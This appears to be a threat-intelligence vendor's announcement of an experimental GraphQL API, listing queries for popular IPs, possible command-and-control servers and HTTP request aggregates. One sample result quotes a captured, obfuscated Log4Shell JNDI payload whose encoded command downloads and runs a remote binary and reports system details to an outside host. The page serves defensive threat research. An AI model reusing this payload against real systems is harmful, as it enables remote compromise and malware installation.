This is an experimental blueprint service available at https://api.labs.greynoise.io. This authenticated GraphQL API opens up a whole new world of possibilities, exposing queries that tap into the vast data lake of GreyNoise.
We’re excited to see how our users will engage with this data and discover new use cases. To get started, you’ll need to sign up for a GreyNoise account here to authenticate to the Labs API.
For the latest queries and examples, make sure to check out our comprehensive documentation.
Please note that this is a blueprint and not intended for direct use in production or critical workflows. While we haven’t released any client SDKs at this time, the schema introspection is enabled, allowing others to quickly build their own experimental tools if they wish.
Ready to dive in? Click Here to get started.
Availability
This is a free, experimental API. There are no gurantees to it’s availability, performance, or longevity. The team intends to build in scheduled deprecation to new queries that will be captured in the documentation. This is so we can focus on continually enabling new functionality and determining how useful this functionality is to determine if it warrants becoming a production endpoint/query.
Limits
For each available query, this API exposes only a percentage of the most useful results. Additionally, this API has a rate limit that is captured in the documentation site.
Queries
Currently this API exposes three primary sources of data. The request and response formats are likely to change a bit for this first release as we tweak a bit so please reference the generated documentation above over any examples within this article.
Popular IPs
A list of IPs commonly searched by GreyNoise users including the number of users that requested them and how often they were requested.
We understand the privacy implications of releasing this data and require consensus above a threshold before metadata on a popular IP can be shared. No user data is released within this query nor will ever be included in queries from this API.
QUERY
query popularIPs {
listPopularIPs {
ip
request_count
users_count
}
}
RESULTS (truncated)
{
"data": {
"listPopularIPs": [
{
"ip": "157.240.225.39",
"users_count": 9,
"request_count": 80
},
{
"ip": "52.216.32.201",
"users_count": 8,
"request_count": 20
},
{
"ip": "181.197.200.69",
"users_count": 6,
"request_count": 25
}
]
}
}
Possible C2s
A list of possible C2s along with extracted domains, IPs, the original payload, and metadata about these potential C2s to provide context on pervasiveness and rate.
QUERY
query listC2s {
listC2s {
c2_domains
c2_ips
hits
payload
pervasiveness
source_ip
}
}
RESULTS (truncated)
{
"source_ip": "95.214.55.244",
"c2_domains": [
"[]"
],
"c2_ips": [
"[129.151.84.124]"
],
"hits": 2599,
"payload": "GET / HTTP/1.1\r\nAccept: application/json, text/plain, */*\r\nX-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkpOyBzdWRvIGN1cmwgaHR0cDovLzEyOS4xNTEuNjQuNTUvYXJjaC8kKHVuYW1lIC1tKS91c2VyLyQod2hvYW1pKQ==}')\r\nUser-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5kdWNrL3VwZGF0ZXIgOyBjdXJsIC1PIGh0dHA6Ly8xMzQuNjUuNjIuNjQvLmR1Y2svdXBkYXRlciA7IGNobW9kICt4IHVwZGF0ZXIgOyBjaG1vZCA3NzcgdXBkYXRlciA7IC4vdXBkYXRlciBydW5uZXIgOyBzdWRvIC4vdXBkYXRlciBydW5uZXIgOyBybSAtcmYgdXBkYXRlcjsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0",
"pervasiveness": 18
}
HTTP Requests
An aggregation of HTTP request paths/bodies/useragents along with metadata about these requests to provide context on a payloads pervasiveness and rate.
QUERY
query HTTPRequests {
listHTTPRequests {
date
method
path
pervasiveness
request_headers
request_count
source_ip_count
}
}
RESULTS (truncated)
{
"data": {
"listHTTPRequests": [
{
"date": "2023-04-14",
"method": "GET",
"path": "/hudson",
"pervasiveness": 100,
"request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 zgrab/0.x]",
"request_count": 3063,
"source_ip_count": 146
},
{
"date": "2023-04-14",
"method": "GET",
"path": "/",
"pervasiveness": 100,
"request_headers": "[Accept:*/*, Accept-Encoding:gzip, User-Agent:Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)]",
"request_count": 18023,
"source_ip_count": 54
}
]
}
}
Helpful Hints
You can clear out the existing query and then navigate to the query explorer on the left hand side and create a new query with point & click.
If you prefer to live in the CLI you can use Copy as cURL
on the left hand side under the tool panel. This will also copy your current authentication header which will expire after a set period of time. You can just log back into the API to get a new one.
After a query finishes in the Playground you can download the JSON results on the bottom right.